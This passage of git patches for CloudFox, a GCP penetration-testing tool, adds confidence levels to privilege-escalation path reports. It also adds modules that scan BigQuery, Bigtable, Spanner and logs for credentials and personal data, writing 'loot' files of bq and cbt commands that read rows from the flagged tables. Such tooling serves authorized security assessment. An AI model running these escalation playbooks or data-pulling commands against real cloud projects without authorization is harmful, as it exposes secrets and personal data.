SCOPE]" } else if edge.ScopeLimited { - scopeInfo = " [scope-limited]" + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) } - sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, scopeInfo)) + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) } sb.WriteString("\n") } diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 11fbf8f6..4bc819a9 100755 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -303,7 +303,11 @@ func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f fox } sb.WriteString(fmt.Sprintf("# %s (%s)\n", f.Principal, f.MemberType)) - sb.WriteString(fmt.Sprintf("# Shortest path: %d hops | Viable paths: %d\n", f.ShortestPathHops, f.ViablePathCount)) + confidenceNote := "" + if f.BestPathConfidence != "" && f.BestPathConfidence != "high" { + confidenceNote = fmt.Sprintf(" | Confidence: %s", f.BestPathConfidence) + } + sb.WriteString(fmt.Sprintf("# Shortest path: %d hops | Viable paths: %d%s\n", f.ShortestPathHops, f.ViablePathCount, confidenceNote)) if f.ScopeBlockedCount > 0 { sb.WriteString(fmt.Sprintf("# WARNING: %d paths blocked by OAuth scopes\n", f.ScopeBlockedCount)) } @@ -326,11 +330,15 @@ func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f fox // Generate commands for each edge in the path currentPrincipal := f.Principal for i, edge := range path.Edges { - scopeWarning := "" + annotations := "" if edge.ScopeBlocksEscalation { - scopeWarning = " [BLOCKED BY SCOPE]" + annotations = " [BLOCKED BY SCOPE]" } else if edge.ScopeLimited { - scopeWarning = " [scope-limited]" + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) } // Use full reason if available, otherwise short reason @@ -339,7 +347,7 @@ func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f fox displayReason = edge.ShortReason } - sb.WriteString(fmt.Sprintf("# Step %d: %s%s\n", i+1, displayReason, scopeWarning)) + sb.WriteString(fmt.Sprintf("# Step %d: %s%s\n", i+1, displayReason, annotations)) // Get the exploit command for this technique (pass both short and full reason) cmd := getPrivescExploitCommand(edge.ShortReason, edge.Reason, currentPrincipal, edge.Destination, sourceProject) @@ -378,6 +386,7 @@ func (m *PrivescModule) getHeader() []string { "Privesc To", "Privesc Admin Level", "Hops", + "Confidence", "Permission", } } @@ -405,6 +414,7 @@ func (m *PrivescModule) findingsToTableBody() [][]string { privescTo := "-" privescAdminLevel := "-" hops := "-" + confidence := "-" permission := "-" if f.CanEscalate && len(f.Paths) > 0 { @@ -419,6 +429,12 @@ func (m *PrivescModule) findingsToTableBody() [][]string { } hops = fmt.Sprintf("%d", bestPath.HopCount) + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + // Get the permission from the first edge - prefer Reason over ShortReason if len(bestPath.Edges) > 0 { permission = extractPermissionFromEdge(bestPath.Edges[0]) @@ -476,6 +492,7 @@ func (m *PrivescModule) findingsToTableBody() [][]string { privescTo, privescAdminLevel, hops, + confidence, permission, }) } @@ -663,6 +680,7 @@ func (m *PrivescModule) findingsToTableBodyForProject(projectID string) [][]stri privescTo := "-" privescAdminLevel := "-" hops := "-" + confidence := "-" permission := "-" if f.CanEscalate && len(f.Paths) > 0 { @@ -675,6 +693,12 @@ func (m *PrivescModule) findingsToTableBodyForProject(projectID string) [][]stri } hops = fmt.Sprintf("%d", bestPath.HopCount) + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + // Get the permission from the first edge if len(bestPath.Edges) > 0 { permission = extractPermissionFromEdge(bestPath.Edges[0]) @@ -729,6 +753,7 @@ func (m *PrivescModule) findingsToTableBodyForProject(projectID string) [][]stri privescTo, privescAdminLevel, hops, + confidence, permission, }) } diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 6cd6814f..8e101cde 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -890,6 +890,11 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel permission = path.Edges[0].ShortReason } + pathConf := path.Confidence + if pathConf == "" || pathConf == "high" { + pathConf = "confirmed" + } + privEscPath := PrivilegeEscalationPath{ ProjectID: "", // FoxMapper doesn't track project per edge Permission: permission, @@ -898,7 +903,7 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel SourceRole: finding.Principal, SourceScope: path.AdminLevel, Command: command, - Confidence: "confirmed", + Confidence: pathConf, RequiredPerms: permission, } @@ -1470,23 +1475,31 @@ func (m *WhoAmIModule) generatePrivescPlaybook() string { if path.ScopeBlocked { scopeStatus = " [SCOPE-BLOCKED]" } + confidenceStatus := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceStatus = fmt.Sprintf(" [%s confidence]", path.Confidence) + } - sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n", - pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus, confidenceStatus)) // Show the path as a visual chain sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) for i, edge := range path.Edges { sb.WriteString(" │\n") - scopeWarning := "" + annotations := "" if edge.ScopeBlocksEscalation { - scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE" + annotations = " ⚠️ BLOCKED BY OAUTH SCOPE" } else if edge.ScopeLimited { - scopeWarning = " ⚠️ scope-limited" + annotations = " ⚠️ scope-limited" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) } - sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning)) + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, annotations)) if edge.Resource != "" { sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) diff --git a/gcp/services/foxmapperService/foxmapperService.go b/gcp/services/foxmapperService/foxmapperService.go index a41c5db2..cbc0f97a 100755 --- a/gcp/services/foxmapperService/foxmapperService.go +++ b/gcp/services/foxmapperService/foxmapperService.go @@ -72,18 +72,42 @@ func (fb *FlexibleBool) UnmarshalJSON(data []byte) error { // Edge represents a privilege escalation edge from FoxMapper graph type Edge struct { - Source string `json:"source"` - Destination string `json:"destination"` - Reason string `json:"reason"` - ShortReason string `json:"short_reason"` - EdgeType string `json:"edge_type"` - Resource string `json:"resource"` + Source string `json:"source"` + Destination string `json:"destination"` + Reason string `json:"reason"` + ShortReason string `json:"short_reason"` + EdgeType string `json:"edge_type"` + Resource string `json:"resource"` + Confidence string `json:"confidence,omitempty"` // high (default/empty), medium, low Conditions map[string]any `json:"conditions"` - ScopeLimited FlexibleBool `json:"scope_limited"` - ScopeWarning string `json:"scope_warning"` - ScopeBlocksEscalation FlexibleBool `json:"scope_blocks_escalation"` - ScopeAllowsMethods []string `json:"scope_allows_methods"` - Scopes []string `json:"scopes"` + ScopeLimited FlexibleBool `json:"scope_limited"` + ScopeWarning string `json:"scope_warning"` + ScopeBlocksEscalation FlexibleBool `json:"scope_blocks_escalation"` + ScopeAllowsMethods []string `json:"scope_allows_methods"` + Scopes []string `json:"scopes"` +} + +// EffectiveConfidence returns the edge's confidence, defaulting to "high" if empty +func (e Edge) EffectiveConfidence() string { + if e.Confidence == "" { + return "high" + } + return e.Confidence +} + +// WorstConfidence returns the worse of two confidence levels (low < medium < high) +func WorstConfidence(a, b string) string { + order := map[string]int{"low": 0, "medium": 1, "high": 2} + if a == "" { + a = "high" + } + if b == "" { + b = "high" + } + if order[a] <= order[b] { + return a + } + return b } // Policy represents an IAM policy from FoxMapper graph @@ -116,6 +140,7 @@ type PrivescPath struct { HopCount int AdminLevel string // org, folder, project ScopeBlocked bool + Confidence string // worst confidence across all edges in path (high, medium, low) } // FoxMapperService provides access to FoxMapper graph data @@ -614,6 +639,7 @@ func (s *FoxMapperService) GetPrivescPaths(principal string) []PrivescPath { // Build edges for this path var pathEdges []Edge scopeBlocked := false + pathConfidence := "high" for i := 0; i < len(shortestPath)-1; i++ { edge := s.findEdge(shortestPath[i], shortestPath[i+1]) if edge != nil { @@ -621,16 +647,18 @@ func (s *FoxMapperService) GetPrivescPaths(principal string) []PrivescPath { if edge.ScopeBlocksEscalation { scopeBlocked = true } + pathConfidence = WorstConfidence(pathConfidence, edge.EffectiveConfidence()) } } paths = append(paths, PrivescPath{ - Source: node.Email, - Destination: admin.Email, - Edges: pathEdges, - HopCount: len(pathEdges), - AdminLevel: admin.AdminLevel, + Source: node.Email, + Destination: admin.Email, + Edges: pathEdges, + HopCount: len(pathEdges), + AdminLevel: admin.AdminLevel, ScopeBlocked: scopeBlocked, + Confidence: pathConfidence, }) } } @@ -676,9 +704,10 @@ func (s *FoxMapperService) GetAttackSummary(principal string) string { if node.PathToAdmin { paths := s.GetPrivescPaths(principal) if len(paths) > 0 { - // Find the highest admin level reachable + // Find the highest admin level reachable and best confidence highestLevel := "project" shortestHops := paths[0].HopCount + bestConfidence := paths[0].Confidence for _, p := range paths { if p.AdminLevel == "org" { highestLevel = "org" @@ -686,6 +715,9 @@ func (s *FoxMapperService) GetAttackSummary(principal string) string { highestLevel = "folder" } } + if bestConfidence != "" && bestConfidence != "high" { + return fmt.Sprintf("Privesc->%s (%d hops, %s confidence)", highestLevel, shortestHops, bestConfidence) + } return fmt.Sprintf("Privesc->%s (%d hops)", highestLevel, shortestHops) } return "Privesc" @@ -752,15 +784,23 @@ func (s *FoxMapperService) GetPrivescSummary() map[string]interface{} { // FormatPrivescPath formats a privesc path for display func FormatPrivescPath(path PrivescPath) string { var sb strings.Builder - sb.WriteString(fmt.Sprintf("%s -> %s (%d hops)\n", path.Source, path.Destination, path.HopCount)) + confidenceInfo := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceInfo = fmt.Sprintf(", %s confidence", path.Confidence) + } + sb.WriteString(fmt.Sprintf("%s -> %s (%d hops%s)\n", path.Source, path.Destination, path.HopCount, confidenceInfo)) for i, edge := range path.Edges { - scopeInfo := "" + annotations := "" if edge.ScopeBlocksEscalation { - scopeInfo = " [BLOCKED BY SCOPE]" + annotations = " [BLOCKED BY SCOPE]" } else if edge.ScopeLimited { - scopeInfo = " [scope-limited]" + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) } - sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, scopeInfo)) + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) } return sb.String() } @@ -890,6 +930,7 @@ type PrivescFinding struct { PathsToFolderAdmin int `json:"paths_to_folder_admin"` PathsToProjectAdmin int `json:"paths_to_project_admin"` ShortestPathHops int `json:"shortest_path_hops"` + BestPathConfidence string `json:"best_path_confidence,omitempty"` // confidence of best path (high, medium, low) Paths []PrivescPath `json:"paths,omitempty"` } @@ -973,6 +1014,7 @@ func (s *FoxMapperService) AnalyzePrivesc() []PrivescFinding { // Set the highest reachable target info if bestPath != nil { finding.HighestReachableTarget = bestPath.Destination + finding.BestPathConfidence = bestPath.Confidence // Try to get project info from the destination node destNode := s.GetNode(bestPath.Destination) if destNode != nil { diff --git a/internal/gcp/foxmapper_cache.go b/internal/gcp/foxmapper_cache.go index e12edb29..3308e771 100755 --- a/internal/gcp/foxmapper_cache.go +++ b/internal/gcp/foxmapper_cache.go @@ -175,6 +175,10 @@ func (c *FoxMapperCache) HasPrivesc(serviceAccount string) (bool, string) { if node.PathToAdmin { paths := c.service.GetPrivescPaths(serviceAccount) if len(paths) > 0 { + conf := paths[0].Confidence + if conf != "" && conf != "high" { + return true, fmt.Sprintf("Privesc (%d hops, %s confidence)", paths[0].HopCount, conf) + } return true, fmt.Sprintf("Privesc (%d hops)", paths[0].HopCount) } return true, "Privesc" From 60c6b8d61c68f6e5ca63ddd0d3613e57fdafd5ea Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 26 Feb 2026 12:55:50 -0500 Subject: [PATCH 46/48] added log-enum, bigquery-enum, bigtable-enum, spanner-enum to search for sensitive stored data --- cli/gcp.go | 18 +- gcp/commands/bigqueryenum.go | 279 +++++++++++++ gcp/commands/bigtableenum.go | 253 ++++++++++++ gcp/commands/logenum.go | 277 +++++++++++++ gcp/commands/spannerenum.go | 247 ++++++++++++ .../bigqueryEnumService.go | 233 +++++++++++ .../bigtableEnumService.go | 121 ++++++ .../bucketEnumService/bucketEnumService.go | 189 ++------- gcp/services/logEnumService/logEnumService.go | 171 ++++++++ .../spannerEnumService/spannerEnumService.go | 201 ++++++++++ gcp/shared/sensitive.go | 368 ++++++++++++++++++ gcp/shared/sensitive_test.go | 191 +++++++++ globals/gcp.go | 4 + 13 files changed, 2383 insertions(+), 169 deletions(-) create mode 100644 gcp/commands/bigqueryenum.go create mode 100644 gcp/commands/bigtableenum.go create mode 100644 gcp/commands/logenum.go create mode 100644 gcp/commands/spannerenum.go create mode 100644 gcp/services/bigqueryEnumService/bigqueryEnumService.go create mode 100644 gcp/services/bigtableEnumService/bigtableEnumService.go create mode 100644 gcp/services/logEnumService/logEnumService.go create mode 100644 gcp/services/spannerEnumService/spannerEnumService.go create mode 100644 gcp/shared/sensitive.go create mode 100644 gcp/shared/sensitive_test.go diff --git a/cli/gcp.go b/cli/gcp.go index cfd9d3b7..7bddfdf5 100755 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -302,7 +302,17 @@ var GCPAllChecksCommand = &cobra.Command{ GCPLogger.InfoM("", "all-checks") } - // Count total modules to execute (excluding self, hidden, and privesc which we already ran) + // Modules excluded from all-checks (run separately, not part of standard enumeration) + excludeFromAllChecks := map[string]bool{ + "privesc": true, // Already ran above + "bucket-enum": true, // Sensitive data enum modules (run separately) + "log-enum": true, + "bigquery-enum": true, + "bigtable-enum": true, + "spanner-enum": true, + } + + // Count total modules to execute (excluding self, hidden, and excluded modules) var modulesToRun []*cobra.Command for _, childCmd := range GCPCommands.Commands() { if childCmd == cmd { // Skip the run-all command itself @@ -311,7 +321,7 @@ var GCPAllChecksCommand = &cobra.Command{ if childCmd.Hidden { // Skip hidden commands continue } - if childCmd.Use == "privesc" { // Skip privesc since we already ran it + if excludeFromAllChecks[childCmd.Use] { continue } modulesToRun = append(modulesToRun, childCmd) @@ -565,6 +575,10 @@ func init() { commands.GCPPrivescCommand, commands.GCPOrgPoliciesCommand, commands.GCPBucketEnumCommand, + commands.GCPLogEnumCommand, + commands.GCPBigQueryEnumCommand, + commands.GCPBigtableEnumCommand, + commands.GCPSpannerEnumCommand, commands.GCPCrossProjectCommand, commands.GCPSourceReposCommand, commands.GCPServiceAgentsCommand, diff --git a/gcp/commands/bigqueryenum.go b/gcp/commands/bigqueryenum.go new file mode 100644 index 00000000..7bbedfbf --- /dev/null +++ b/gcp/commands/bigqueryenum.go @@ -0,0 +1,279 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + bigqueryenumservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bqEnumSampleData bool + bqEnumMaxRows int + bqEnumMaxTables int +) + +var GCPBigQueryEnumCommand = &cobra.Command{ + Use: globals.GCP_BIGQUERYENUM_MODULE_NAME, + Aliases: []string{"bq-enum", "bq-scan"}, + Short: "Scan BigQuery datasets, tables, and columns for sensitive data indicators", + Long: `Scan BigQuery metadata for potentially sensitive data. + +Phase 1 (always runs): Scans dataset names, table names, and column names +against sensitive data patterns (credentials, PII, financial, compliance). + +Phase 2 (opt-in): Samples data from flagged tables and scans content for +credentials, tokens, and other sensitive values. + +Flags: + --sample-data Enable data sampling on flagged tables (default off) + --max-rows Maximum rows to sample per table (default 100) + --max-tables Maximum tables to scan per project (default 50)`, + Run: runGCPBigQueryEnumCommand, +} + +func init() { + GCPBigQueryEnumCommand.Flags().BoolVar(&bqEnumSampleData, "sample-data", false, "Sample data from flagged tables and scan content") + GCPBigQueryEnumCommand.Flags().IntVar(&bqEnumMaxRows, "max-rows", 100, "Maximum rows to sample per table") + GCPBigQueryEnumCommand.Flags().IntVar(&bqEnumMaxTables, "max-tables", 50, "Maximum tables to scan per project") +} + +type BigQueryEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]bigqueryenumservice.SensitiveBQResource + LootMap map[string]map[string]*internal.LootFile + SampleData bool + MaxRows int + MaxTables int + mu sync.Mutex +} + +type BigQueryEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigQueryEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigQueryEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERYENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BigQueryEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]bigqueryenumservice.SensitiveBQResource), + LootMap: make(map[string]map[string]*internal.LootFile), + SampleData: bqEnumSampleData, + MaxRows: bqEnumMaxRows, + MaxTables: bqEnumMaxTables, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigQueryEnumModule) Execute(ctx context.Context, logger internal.Logger) { + mode := "metadata scan" + if m.SampleData { + mode = "metadata scan + data sampling" + } + logger.InfoM(fmt.Sprintf("Scanning BigQuery resources (%s, max %d tables per project)...", + mode, m.MaxTables), globals.GCP_BIGQUERYENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERYENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive BigQuery resources found", globals.GCP_BIGQUERYENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive BigQuery resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_BIGQUERYENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *BigQueryEnumModule) getAllResources() []bigqueryenumservice.SensitiveBQResource { + var all []bigqueryenumservice.SensitiveBQResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BigQueryEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning BigQuery in project: %s", projectID), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } + + svc := bigqueryenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID, m.MaxTables, m.SampleData, m.MaxRows) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERYENUM_MODULE_NAME, + fmt.Sprintf("Could not scan BigQuery in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "bigquery-enum-commands", + Contents: "# BigQuery Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s.%s.%s\n# %s\nbq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 10'\n\n", + r.RiskLevel, r.Category, projectID, r.Dataset, r.Table, + r.Description, + projectID, r.Dataset, r.Table, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s.%s\n# %s\nbq ls %s:%s\n\n", + r.RiskLevel, r.Category, projectID, r.Dataset, + r.Description, + projectID, r.Dataset, + ) + } + } + m.LootMap[projectID]["bigquery-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *BigQueryEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BigQueryEnumModule) getHeader() []string { + return []string{"Project", "Dataset", "Table", "Column", "Match Type", "Category", "Risk Level", "Description"} +} + +func (m *BigQueryEnumModule) resourcesToTableBody(resources []bigqueryenumservice.SensitiveBQResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Dataset, + r.Table, + r.Column, + r.MatchType, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *BigQueryEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "bigquery-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *BigQueryEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigQueryEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } +} + +func (m *BigQueryEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "bigquery-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigQueryEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/bigtableenum.go b/gcp/commands/bigtableenum.go new file mode 100644 index 00000000..a8cac26e --- /dev/null +++ b/gcp/commands/bigtableenum.go @@ -0,0 +1,253 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + bigtableenumservice "github.com/BishopFox/cloudfox/gcp/services/bigtableEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableEnumCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLEENUM_MODULE_NAME, + Aliases: []string{"bt-enum", "bt-scan"}, + Short: "Scan Bigtable instances, tables, and column families for sensitive data indicators", + Long: `Scan Bigtable metadata for potentially sensitive data. + +Scans instance names, table names, and column family names against sensitive +data patterns (credentials, PII, financial, compliance keywords). + +Detects resources with names suggesting they store: +- Credentials, tokens, or secrets +- PII (SSN, credit cards) +- Financial data (payments, billing, salary) +- Compliance-labeled data (HIPAA, GDPR, PII)`, + Run: runGCPBigtableEnumCommand, +} + +type BigtableEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]bigtableenumservice.SensitiveBTResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +type BigtableEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLEENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]bigtableenumservice.SensitiveBTResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Scanning Bigtable resources for sensitive data indicators...", globals.GCP_BIGTABLEENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLEENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive Bigtable resources found", globals.GCP_BIGTABLEENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive Bigtable resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_BIGTABLEENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *BigtableEnumModule) getAllResources() []bigtableenumservice.SensitiveBTResource { + var all []bigtableenumservice.SensitiveBTResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BigtableEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning Bigtable in project: %s", projectID), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } + + svc := bigtableenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLEENUM_MODULE_NAME, + fmt.Sprintf("Could not scan Bigtable in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "bigtable-enum-commands", + Contents: "# Bigtable Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s/%s\n# %s\ncbt -project %s -instance %s read %s count=10\n\n", + r.RiskLevel, r.Category, r.Instance, r.Table, + r.Description, + projectID, r.Instance, r.Table, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - instance: %s\n# %s\ncbt -project %s -instance %s ls\n\n", + r.RiskLevel, r.Category, r.Instance, + r.Description, + projectID, r.Instance, + ) + } + } + m.LootMap[projectID]["bigtable-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *BigtableEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeBigtableHierarchicalOutput(ctx, logger) + } else { + m.writeBigtableFlatOutput(ctx, logger) + } +} + +func (m *BigtableEnumModule) getHeader() []string { + return []string{"Project", "Instance", "Table", "Column Family", "Category", "Risk Level", "Description"} +} + +func (m *BigtableEnumModule) resourcesToTableBody(resources []bigtableenumservice.SensitiveBTResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Instance, + r.Table, + r.ColumnFamily, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *BigtableEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "bigtable-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *BigtableEnumModule) writeBigtableHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = 